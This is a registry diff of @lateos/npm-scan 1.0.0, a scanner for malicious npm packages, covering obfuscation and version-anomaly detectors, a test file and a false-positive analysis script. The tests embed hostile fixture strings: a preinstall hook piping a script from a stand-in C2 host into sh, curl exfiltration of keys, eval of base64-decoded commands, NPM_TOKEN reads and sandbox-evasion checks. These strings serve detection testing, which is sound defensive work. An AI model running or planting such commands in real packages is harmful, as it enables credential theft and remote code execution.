@lateos/npm-scan 0.18.3 → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (46) hide show
  1. package/CHANGELOG.md +32 -0
  2. package/README.md +35 -0
  3. package/VALIDATION.md +92 -0
  4. package/backend/db/pg-schema.sql +155 -0
  5. package/backend/detectors/config/thresholds.js +66 -0
  6. package/backend/detectors/config/whitelist.json +74 -0
  7. package/backend/detectors/index.js +6 -0
  8. package/backend/detectors/lib/ast-patterns.js +21 -0
  9. package/backend/detectors/lib/entropy-analyzer.js +24 -0
  10. package/backend/detectors/tier1-binary-embed.js +34 -5
  11. package/backend/detectors/tier1-obfuscation-heuristics.js +156 -0
  12. package/backend/detectors/tier1-slsa-attestation.js +12 -0
  13. package/backend/detectors/tier1-version-anomaly.js +187 -0
  14. package/backend/detectors.test.js +88 -0
  15. package/backend/scripts/analyze-false-positives.js +146 -0
  16. package/backend/scripts/analyze-validation.js +151 -0
  17. package/backend/scripts/detect-false-positives.js +93 -0
  18. package/backend/scripts/fetch-top-packages.js +129 -0
  19. package/backend/scripts/validate-detectors.js +142 -0
  20. package/backend/tests-d5-enhanced.test.js +46 -0
  21. package/backend/tests-d6-version-anomaly.test.js +58 -0
  22. package/backend/tests-d6.test.js +116 -0
  23. package/backend/tests-d6c.test.js +106 -0
  24. package/backend/tests-d7-obfuscation.test.js +91 -0
  25. package/backend/tests.test.js +898 -0
  26. package/package.json +25 -8
  27. package/.dockerignore +0 -20
  28. package/.husky/pre-commit +0 -1
  29. package/SECURITY.md +0 -73
  30. package/deploy/helm/npm-scan/Chart.yaml +0 -22
  31. package/deploy/helm/npm-scan/templates/_helpers.tpl +0 -9
  32. package/deploy/helm/npm-scan/templates/api.yaml +0 -94
  33. package/deploy/helm/npm-scan/templates/ingress.yaml +0 -28
  34. package/deploy/helm/npm-scan/templates/postgresql.yaml +0 -67
  35. package/deploy/helm/npm-scan/templates/secrets.yaml +0 -19
  36. package/deploy/helm/npm-scan/templates/worker.yaml +0 -32
  37. package/deploy/helm/npm-scan/values.byoc.yaml +0 -75
  38. package/deploy/helm/npm-scan/values.yaml +0 -103
  39. package/scripts/download-corpus.js +0 -30
  40. package/scripts/gen-mal-corpus.js +0 -35
  41. package/scripts/generate-campaign-fixtures.js +0 -170
  42. package/src/config/top-5000.json +0 -87
  43. package/test/fixtures/lockfiles/npm-lock.json +0 -69
  44. package/test/fixtures/lockfiles/pnpm-lock.yaml +0 -118
  45. package/test/fixtures/lockfiles/yarn.lock +0 -104
  46. package/test/fixtures/mock-data.js +0 -69
@@ -0,0 +1,156 @@
1
+ import { KNOWN_REPUTABLE_PACKAGES } from '../policy.js';
2
+ import { shannonEntropy, isMinified } from './lib/entropy-analyzer.js';
3
+ import { detectPatterns } from './lib/ast-patterns.js';
4
+
5
+ const LIFECYCLE_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
6
+ const ENTROPY_THRESHOLD = 5.3;
7
+ const PAYLOAD_SIZE_THRESHOLD = 100000;
8
+
9
+ function analyze(code, label) {
10
+ if (!code || code.length < 20) return null;
11
+
12
+ const entropy = shannonEntropy(code);
13
+ const patterns = detectPatterns(code);
14
+ const minified = isMinified(code);
15
+ const payloadSize = code.length;
16
+
17
+ let score = 0;
18
+ let flags = [];
19
+
20
+ if (entropy > ENTROPY_THRESHOLD) {
21
+ score += 35;
22
+ flags.push(`Entropy ${entropy} exceeds threshold ${ENTROPY_THRESHOLD}`);
23
+ }
24
+
25
+ if (entropy > 5.8) {
26
+ score += 15;
27
+ flags.push(`High entropy ${entropy} — strong obfuscation indicator`);
28
+ }
29
+
30
+ const patternCount = patterns.length;
31
+ if (patternCount >= 3) {
32
+ score += 30;
33
+ flags.push(`${patternCount} obfuscation patterns detected`);
34
+ } else if (patternCount >= 1) {
35
+ score += 20;
36
+ flags.push(`${patternCount} obfuscation patterns detected`);
37
+ }
38
+
39
+ if (minified) {
40
+ score += 10;
41
+ flags.push('Minified code — reduced readability');
42
+ }
43
+
44
+ if (payloadSize > PAYLOAD_SIZE_THRESHOLD) {
45
+ score += 15;
46
+ flags.push(`Payload size ${payloadSize} bytes exceeds ${PAYLOAD_SIZE_THRESHOLD} byte threshold`);
47
+ }
48
+
49
+ if (patterns.includes('XOR_CIPHER') && patterns.length >= 2) {
50
+ score += 10;
51
+ flags.push('ctf-scramble-v2 style XOR cipher detected');
52
+ }
53
+
54
+ if (patterns.includes('EVAL_USAGE') && entropy > 5.0) {
55
+ score += 15;
56
+ flags.push('eval() with high-entropy code');
57
+ }
58
+
59
+ score = Math.max(0, Math.min(100, score));
60
+
61
+ if (score < 40) return null;
62
+
63
+ return {
64
+ flagged: true,
65
+ confidenceScore: score,
66
+ confidence: score >= 80 ? 'HIGH' : score >= 60 ? 'MEDIUM' : 'LOW',
67
+ entropy,
68
+ patterns,
69
+ patternCount,
70
+ payloadSize,
71
+ flags,
72
+ };
73
+ }
74
+
75
+ function severityLabel(sc) {
76
+ if (sc >= 90) return 'critical';
77
+ if (sc >= 70) return 'high';
78
+ if (sc >= 50) return 'medium';
79
+ return 'low';
80
+ }
81
+
82
+ function confidenceLabel(sc) {
83
+ if (sc >= 80) return 'HIGH';
84
+ if (sc >= 60) return 'MEDIUM';
85
+ return 'LOW';
86
+ }
87
+
88
+ export const name = 'tier1-obfuscation-heuristics';
89
+
90
+ export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
91
+ const pkgName = pkgJson?.name;
92
+ if (pkgName && KNOWN_REPUTABLE_PACKAGES.has(pkgName)) return [];
93
+
94
+ const findings = [];
95
+ const scripts = pkgJson?.scripts || {};
96
+
97
+ for (const [hookName, scriptContent] of Object.entries(scripts)) {
98
+ if (!LIFECYCLE_SCRIPTS.includes(hookName)) continue;
99
+ const result = analyze(scriptContent, hookName);
100
+ if (!result) continue;
101
+
102
+ findings.push({
103
+ detector: 'tier1-obfuscation-heuristics',
104
+ id: 'TIER1-OBFUSCATION-HEURISTICS',
105
+ severity: severityLabel(result.confidenceScore),
106
+ confidence: confidenceLabel(result.confidenceScore),
107
+ confidenceScore: result.confidenceScore,
108
+ subtype: 'obfuscated_lifecycle_script',
109
+ message: `Obfuscation detected in ${hookName} script: ${result.flags[0] || 'obfuscation patterns found'}`,
110
+ evidence: [
111
+ `script: ${hookName}`,
112
+ `entropy: ${result.entropy}`,
113
+ `patterns: ${result.patterns.join(', ') || 'none'}`,
114
+ `pattern_count: ${result.patternCount}`,
115
+ `payload_size_bytes: ${result.payloadSize}`,
116
+ ...result.flags,
117
+ ],
118
+ crossFiles: [],
119
+ locations: [{ file: 'package.json', line: 3, column: 10 }],
120
+ reference: 'Mini Shai-Hulud obfuscation campaign',
121
+ });
122
+ }
123
+
124
+ for (const f of jsFiles || []) {
125
+ const content = f.content || '';
126
+ if (content.length < 100) continue;
127
+
128
+ const result = analyze(content, f.path || 'unknown.js');
129
+ if (!result) continue;
130
+
131
+ if (result.confidenceScore < 50) continue;
132
+
133
+ findings.push({
134
+ detector: 'tier1-obfuscation-heuristics',
135
+ id: 'TIER1-OBFUSCATION-HEURISTICS',
136
+ severity: severityLabel(result.confidenceScore),
137
+ confidence: confidenceLabel(result.confidenceScore),
138
+ confidenceScore: result.confidenceScore,
139
+ subtype: 'obfuscated_js_file',
140
+ message: `Obfuscation detected in ${f.path || 'file'}: ${result.flags[0] || 'obfuscation patterns found'}`,
141
+ evidence: [
142
+ `file: ${f.path || 'unknown.js'}`,
143
+ `entropy: ${result.entropy}`,
144
+ `patterns: ${result.patterns.join(', ') || 'none'}`,
145
+ `pattern_count: ${result.patternCount}`,
146
+ `payload_size_bytes: ${result.payloadSize}`,
147
+ ...result.flags,
148
+ ],
149
+ crossFiles: [],
150
+ locations: [{ file: f.path || 'unknown.js', line: 0, column: 0 }],
151
+ reference: 'Mini Shai-Hulud obfuscation campaign',
152
+ });
153
+ }
154
+
155
+ return findings;
156
+ }
@@ -0,0 +1,12 @@
1
+ // D8: SLSA Attestation Mismatch Detector
2
+ // TODO: Implement after npm SLSA attestation API stabilizes
3
+ // Blockers:
4
+ // - npm registry SLSA attestation API not yet widely adopted (as of June 2026)
5
+ // - Requires npm auth token to fetch provenance
6
+ // - May have rate limits
7
+
8
+ export const name = 'tier1-slsa-attestation';
9
+
10
+ export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
11
+ return [];
12
+ }
@@ -0,0 +1,187 @@
1
+ import { KNOWN_REPUTABLE_PACKAGES } from '../policy.js';
2
+
3
+ const SENTINEL_PATTERNS = new Set(['99.99.99', '11.11.11', '10.10.10']);
4
+
5
+ function parseVersion(v) {
6
+ if (!v || typeof v !== 'string') return null;
7
+ const parts = v.split('.');
8
+ if (parts.length !== 3) return null;
9
+ const [major, minor, patch] = parts.map(Number);
10
+ if (isNaN(major) || isNaN(minor) || isNaN(patch)) return null;
11
+ return { major, minor, patch, full: v };
12
+ }
13
+
14
+ function versionScore(v) {
15
+ return v.major * 10000 + v.minor * 100 + v.patch;
16
+ }
17
+
18
+ function extractVersions(registryMeta) {
19
+ if (Array.isArray(registryMeta)) {
20
+ return registryMeta.map(v => parseVersion(v)).filter(Boolean);
21
+ }
22
+ if (registryMeta && typeof registryMeta === 'object') {
23
+ const versions = registryMeta.versions || registryMeta.time;
24
+ if (versions && typeof versions === 'object') {
25
+ return Object.keys(versions).map(v => parseVersion(v)).filter(Boolean);
26
+ }
27
+ }
28
+ return [];
29
+ }
30
+
31
+ function computeStats(scores) {
32
+ if (scores.length < 2) return null;
33
+ const mean = scores.reduce((s, v) => s + v, 0) / scores.length;
34
+ const variance = scores.reduce((s, v) => s + (v - mean) ** 2, 0) / scores.length;
35
+ const stddev = Math.sqrt(variance);
36
+ return { mean, stddev, max: Math.max(...scores), min: Math.min(...scores) };
37
+ }
38
+
39
+ export function analyzeAnomaly(packageName, versionStr, versionHistory) {
40
+ const current = parseVersion(versionStr);
41
+ if (!current) return null;
42
+
43
+ const historical = extractVersions(versionHistory);
44
+ const currentScore = versionScore(current);
45
+ const isSentinel = SENTINEL_PATTERNS.has(versionStr);
46
+
47
+ if (!historical || historical.length < 2) {
48
+ if (isSentinel) {
49
+ return {
50
+ flagged: true,
51
+ confidenceScore: 60,
52
+ confidence: 'MEDIUM',
53
+ zScore: null,
54
+ baselineMax: 'unknown',
55
+ baselineMean: 'unknown',
56
+ reason: `Version ${versionStr} matches known dependency confusion pattern (no registry data to confirm)`,
57
+ attackPattern: 'SENTINEL_PATTERN_ONLY',
58
+ };
59
+ }
60
+ return null;
61
+ }
62
+
63
+ const scores = historical.map(versionScore).sort((a, b) => a - b);
64
+ const recentScores = scores.slice(-50);
65
+ if (recentScores.length < 2) {
66
+ if (isSentinel) {
67
+ return {
68
+ flagged: true,
69
+ confidenceScore: 60,
70
+ confidence: 'MEDIUM',
71
+ zScore: null,
72
+ baselineMax: 'unknown',
73
+ baselineMean: 'unknown',
74
+ reason: `Version ${versionStr} matches known dependency confusion pattern (insufficient history)`,
75
+ attackPattern: 'SENTINEL_PATTERN_ONLY',
76
+ };
77
+ }
78
+ return null;
79
+ }
80
+
81
+ const stats = computeStats(recentScores);
82
+ if (!stats) return null;
83
+
84
+ const zScore = stats.stddev > 0 ? (currentScore - stats.mean) / stats.stddev : 0;
85
+ const baselineMaxVer = historical.find(v => versionScore(v) === stats.max)?.full || 'unknown';
86
+ const baselineMeanVal = (stats.mean / 10000).toFixed(1);
87
+ const prevMaxMajor = Math.floor(stats.max / 10000);
88
+ const isNormalMajorBump = current.major === prevMaxMajor + 1 && current.minor === 0 && current.patch === 0;
89
+ const isReasonableVersion = current.major <= prevMaxMajor + 2 && current.major >= Math.floor(stats.min / 10000);
90
+ const ratio = stats.max > 0 ? currentScore / stats.max : 0;
91
+
92
+ let flagged = false;
93
+ let confidenceScore = 0;
94
+ let attackPattern = '';
95
+ let reason = '';
96
+
97
+ if (isSentinel) {
98
+ flagged = true;
99
+ confidenceScore = 92;
100
+ attackPattern = 'DEPENDENCY_CONFUSION_HIGH_VERSION';
101
+ reason = `Version ${versionStr} matches known dependency confusion sentinel pattern; z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal}`;
102
+ } else if (zScore > 10 && !isNormalMajorBump) {
103
+ flagged = true;
104
+ confidenceScore = 90;
105
+ attackPattern = 'Z_SCORE_EXTREME';
106
+ reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — extreme anomaly`;
107
+ } else if (zScore > 5 && !isNormalMajorBump) {
108
+ flagged = true;
109
+ confidenceScore = 85;
110
+ attackPattern = 'Z_SCORE_ANOMALY';
111
+ reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — strong anomaly`;
112
+ } else if (zScore > 3 && !isNormalMajorBump) {
113
+ flagged = true;
114
+ confidenceScore = 72;
115
+ attackPattern = 'Z_SCORE_ELEVATED';
116
+ reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — elevated anomaly`;
117
+ } else if (ratio > 10 && !isNormalMajorBump) {
118
+ flagged = true;
119
+ confidenceScore = 75;
120
+ attackPattern = 'MAJOR_VERSION_JUMP';
121
+ reason = `Version ${versionStr} exceeds max historical version (${baselineMaxVer}) by factor of ${ratio.toFixed(1)}`;
122
+ } else if (zScore > 2 && !isReasonableVersion) {
123
+ flagged = true;
124
+ confidenceScore = 55;
125
+ attackPattern = 'SUSPICIOUS_VERSION';
126
+ reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} and is outside expected version range`;
127
+ }
128
+
129
+ if (!flagged) return null;
130
+
131
+ return {
132
+ flagged,
133
+ confidenceScore: Math.min(100, confidenceScore),
134
+ confidence: confidenceScore >= 80 ? 'HIGH' : confidenceScore >= 60 ? 'MEDIUM' : 'LOW',
135
+ zScore: Math.round(zScore * 10) / 10,
136
+ baselineMax: baselineMaxVer,
137
+ baselineMean: baselineMeanVal,
138
+ reason,
139
+ attackPattern,
140
+ };
141
+ }
142
+
143
+ function severityLabel(sc) {
144
+ if (sc >= 90) return 'critical';
145
+ if (sc >= 70) return 'high';
146
+ if (sc >= 50) return 'medium';
147
+ return 'low';
148
+ }
149
+
150
+ function confidenceLabel(sc) {
151
+ if (sc >= 80) return 'HIGH';
152
+ if (sc >= 60) return 'MEDIUM';
153
+ return 'LOW';
154
+ }
155
+
156
+ export const name = 'tier1-version-anomaly';
157
+
158
+ export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
159
+ const pkgName = pkgJson?.name;
160
+ const version = pkgJson?.version;
161
+
162
+ if (!pkgName || !version) return [];
163
+ if (pkgName && KNOWN_REPUTABLE_PACKAGES.has(pkgName)) return [];
164
+
165
+ const result = analyzeAnomaly(pkgName, version, registryMeta);
166
+ if (!result) return [];
167
+
168
+ return [{
169
+ detector: 'tier1-version-anomaly',
170
+ id: 'TIER1-VERSION-ANOMALY',
171
+ severity: severityLabel(result.confidenceScore),
172
+ confidence: confidenceLabel(result.confidenceScore),
173
+ confidenceScore: result.confidenceScore,
174
+ subtype: result.attackPattern.toLowerCase(),
175
+ message: `Version anomaly detected in "${pkgName}": ${result.reason}`,
176
+ evidence: [
177
+ `version: ${version}`,
178
+ `baseline_max: ${result.baselineMax}`,
179
+ `baseline_mean: ${result.baselineMean}`,
180
+ `z_score: ${result.zScore ?? 'N/A'}`,
181
+ `attack_pattern: ${result.attackPattern}`,
182
+ ],
183
+ crossFiles: [],
184
+ locations: [{ file: 'package.json', line: 3, column: 10 }],
185
+ reference: '176-package dependency confusion campaign',
186
+ }];
187
+ }
@@ -0,0 +1,88 @@
1
+ import { test } from 'node:test';
2
+ import assert from 'assert/strict';
3
+ import * as detectors from './detectors/index.js';
4
+
5
+ test('detectors runAll empty', async () => {
6
+ const findings = await detectors.runAll({});
7
+ assert.equal(findings.length, 0);
8
+ });
9
+
10
+ test('ATK-001 detects preinstall', async () => {
11
+ const pkg = { scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } };
12
+ const findings = await detectors.runAll(pkg);
13
+ assert(findings.some(f => f.id === 'ATK-001'), 'Expected ATK-001');
14
+ });
15
+
16
+ test('ATK-002 detects eval+decode', async () => {
17
+ const files = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
18
+ const findings = await detectors.runAll({}, files);
19
+ assert(findings.some(f => f.id === 'ATK-002'), 'Expected ATK-002');
20
+ });
21
+
22
+ test('ATK-003 detects cred env vars', async () => {
23
+ const files = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
24
+ const findings = await detectors.runAll({}, files);
25
+ assert(findings.some(f => f.id === 'ATK-003'), 'Expected ATK-003');
26
+ });
27
+
28
+ test('ATK-004 detects editor persistence', async () => {
29
+ const files = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
30
+ const findings = await detectors.runAll({}, files);
31
+ assert(findings.some(f => f.id === 'ATK-004'), 'Expected ATK-004');
32
+ });
33
+
34
+ test('ATK-005 detects network exfil', async () => {
35
+ const files = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
36
+ const findings = await detectors.runAll({}, files);
37
+ assert(findings.some(f => f.id === 'ATK-005'), 'Expected ATK-005');
38
+ });
39
+
40
+ test('ATK-006 detects dep confusion', async () => {
41
+ const pkg = { dependencies: { 'acorn-squatter': '1.0.0' } };
42
+ const findings = await detectors.runAll(pkg);
43
+ assert(findings.some(f => f.id === 'ATK-006'), 'Expected ATK-006');
44
+ });
45
+
46
+ test('ATK-007 detects typosquatting', async () => {
47
+ const pkg = { dependencies: { 'lodash': 'latest', 'loddsh': '1.0.0' } };
48
+ const findings = await detectors.runAll(pkg);
49
+ assert(findings.some(f => f.id === 'ATK-007'), 'Expected ATK-007 for loddsh');
50
+ });
51
+
52
+ test('ATK-008 detects tarball tampering', async () => {
53
+ const pkg = { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-evil.git' } };
54
+ const findings = await detectors.runAll(pkg);
55
+ assert(findings.some(f => f.id === 'ATK-008'), 'Expected ATK-008');
56
+ });
57
+
58
+ test('ATK-009 detects CI env trigger', async () => {
59
+ const files = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
60
+ const findings = await detectors.runAll({}, files);
61
+ assert(findings.some(f => f.id === 'ATK-009'), 'Expected ATK-009');
62
+ });
63
+
64
+ test('ATK-010 detects sandbox evasion', async () => {
65
+ const files = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
66
+ const findings = await detectors.runAll({}, files);
67
+ assert(findings.some(f => f.id === 'ATK-010'), 'Expected ATK-010');
68
+ });
69
+
70
+ test('ATK-011 detects transitive propagation', async () => {
71
+ const files = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
72
+ const findings = await detectors.runAll({}, files);
73
+ assert(findings.some(f => f.id === 'ATK-011'), 'Expected ATK-011');
74
+ });
75
+
76
+ test('no false positives on clean package', async () => {
77
+ const pkg = { name: 'test-pkg', version: '1.0.0', scripts: { test: 'node test.js' }, dependencies: { 'express': '4.0.0' } };
78
+ const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
79
+ const findings = await detectors.runAll(pkg, files);
80
+ const highCrit = findings.filter(f => f.severity === 'high' || f.severity === 'critical');
81
+ assert.equal(highCrit.length, 0, `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`);
82
+ });
83
+
84
+ test('all 11 ATK IDs present', async () => {
85
+ const expected = ['ATK-001', 'ATK-002', 'ATK-003', 'ATK-004', 'ATK-005', 'ATK-006', 'ATK-007', 'ATK-008', 'ATK-009', 'ATK-010', 'ATK-011'];
86
+ const exports = Object.keys(detectors);
87
+ assert.equal(exports.includes('runAll'), true);
88
+ });
@@ -0,0 +1,146 @@
1
+ #!/usr/bin/env node
2
+ import { readFileSync, existsSync, writeFileSync } from 'node:fs';
3
+ import { resolve } from 'node:path';
4
+
5
+ function analyzeFalsePositives(fpFile) {
6
+ const analysis = {
7
+ total_fps: 0,
8
+ scanned_packages: 0,
9
+ fp_rate: '0%',
10
+ detectors: {},
11
+ high_fp_detectors: [],
12
+ recommendations: [],
13
+ per_package: {},
14
+ };
15
+
16
+ const absPath = resolve(fpFile);
17
+ if (!existsSync(absPath)) {
18
+ console.error(`[ERROR] False positives file not found: ${absPath}`);
19
+ process.exit(1);
20
+ }
21
+
22
+ const text = readFileSync(absPath, 'utf-8');
23
+ const lines = text.split('\n').filter(l => l.trim());
24
+
25
+ for (const line of lines) {
26
+ const fp = JSON.parse(line);
27
+ analysis.total_fps += 1;
28
+
29
+ const detector = fp.detector;
30
+ if (!analysis.detectors[detector]) {
31
+ analysis.detectors[detector] = {
32
+ fp_count: 0,
33
+ avg_confidence: 0,
34
+ confidences: [],
35
+ severities: [],
36
+ examples: [],
37
+ unique_packages: new Set(),
38
+ };
39
+ }
40
+
41
+ analysis.detectors[detector].fp_count += 1;
42
+ analysis.detectors[detector].confidences.push(fp.confidence);
43
+ analysis.detectors[detector].severities.push(fp.severity);
44
+ analysis.detectors[detector].unique_packages.add(fp.package);
45
+
46
+ if (analysis.detectors[detector].examples.length < 5) {
47
+ analysis.detectors[detector].examples.push({
48
+ package: fp.package,
49
+ version: fp.version,
50
+ confidence: fp.confidence,
51
+ subtype: fp.subtype,
52
+ });
53
+ }
54
+
55
+ if (!analysis.per_package[fp.package]) {
56
+ analysis.per_package[fp.package] = [];
57
+ }
58
+ analysis.per_package[fp.package].push({
59
+ detector: fp.detector,
60
+ confidence: fp.confidence,
61
+ version: fp.version,
62
+ });
63
+ }
64
+
65
+ for (const [detectorName, stats] of Object.entries(analysis.detectors)) {
66
+ stats.avg_confidence = stats.confidences.length > 0
67
+ ? (stats.confidences.reduce((a, b) => a + b, 0) / stats.confidences.length).toFixed(1)
68
+ : '0.0';
69
+ stats.unique_package_count = stats.unique_packages.size;
70
+ delete stats.unique_packages;
71
+
72
+ const fpShare = (stats.fp_count / analysis.total_fps * 100).toFixed(1);
73
+
74
+ if (stats.fp_count >= 5) {
75
+ analysis.high_fp_detectors.push(detectorName);
76
+ analysis.recommendations.push({
77
+ detector: detectorName,
78
+ fp_count: stats.fp_count,
79
+ unique_packages: stats.unique_package_count,
80
+ share_of_total_fps: fpShare + '%',
81
+ avg_confidence: stats.avg_confidence,
82
+ severity_distribution: stats.severities.reduce((acc, s) => {
83
+ acc[s] = (acc[s] || 0) + 1;
84
+ return acc;
85
+ }, {}),
86
+ suggested_action: `Increase confidence threshold from current to ${Math.min(100, Math.ceil(parseFloat(stats.avg_confidence)) + 5)}`,
87
+ examples: stats.examples,
88
+ });
89
+ }
90
+ }
91
+
92
+ return analysis;
93
+ }
94
+
95
+ const fpFile = process.argv[2] || 'false-positives.jsonl';
96
+
97
+ console.log(`[INFO] Analyzing ${fpFile}...`);
98
+ const analysis = analyzeFalsePositives(fpFile);
99
+
100
+ console.log('\n=== FALSE POSITIVE ANALYSIS ===');
101
+ console.log(`Total FPs: ${analysis.total_fps}`);
102
+ console.log(`Detectors with FPs: ${Object.keys(analysis.detectors).length}`);
103
+
104
+ if (analysis.high_fp_detectors.length > 0) {
105
+ console.log(`\nHigh-FP detectors (>= 5 FPs): ${analysis.high_fp_detectors.join(', ')}`);
106
+ } else {
107
+ console.log('\nNo high-FP detectors found (all < 5 FPs) — thresholds are well-calibrated');
108
+ }
109
+
110
+ console.log('\n=== PER-DETECTOR BREAKDOWN ===');
111
+ console.log('Detector FPs UniquePkgs AvgConf Top Examples');
112
+ console.log('─'.repeat(90));
113
+ for (const [name, stats] of Object.entries(analysis.detectors).sort(
114
+ (a, b) => b[1].fp_count - a[1].fp_count
115
+ )) {
116
+ const dName = name.padEnd(32).slice(0, 32);
117
+ const examples = stats.examples.slice(0, 2).map(e => e.package).join(', ');
118
+ console.log(
119
+ `${dName} ${String(stats.fp_count).padStart(4)} ${String(stats.unique_package_count).padStart(11)} ` +
120
+ `${stats.avg_confidence.padStart(7)} ${examples}`
121
+ );
122
+ }
123
+
124
+ if (analysis.recommendations.length > 0) {
125
+ console.log('\n=== RECOMMENDATIONS ===');
126
+ for (const rec of analysis.recommendations) {
127
+ console.log(`\n${rec.detector}:`);
128
+ console.log(` FPs: ${rec.fp_count} (${rec.share_of_total_fps} of total) across ${rec.unique_packages} unique packages`);
129
+ console.log(` Avg confidence: ${rec.avg_confidence}`);
130
+ console.log(` Severity breakdown: ${JSON.stringify(rec.severity_distribution)}`);
131
+ console.log(` Suggestion: ${rec.suggested_action}`);
132
+ console.log(` Examples:`);
133
+ for (const ex of rec.examples.slice(0, 3)) {
134
+ console.log(` ${ex.package}@${ex.version} (${ex.confidence}%) [${ex.subtype}]`);
135
+ }
136
+ }
137
+ } else {
138
+ console.log('\n=== RECOMMENDATIONS ===');
139
+ console.log('No threshold adjustments needed — FP rates are within acceptable bounds.');
140
+ }
141
+
142
+ const outPath = resolve('fp-analysis.json');
143
+ writeFileSync(outPath, JSON.stringify(analysis, null, 2), 'utf-8');
144
+ console.log(`\n[INFO] Full analysis written to ${outPath}`);
145
+
146
+ process.exit(0);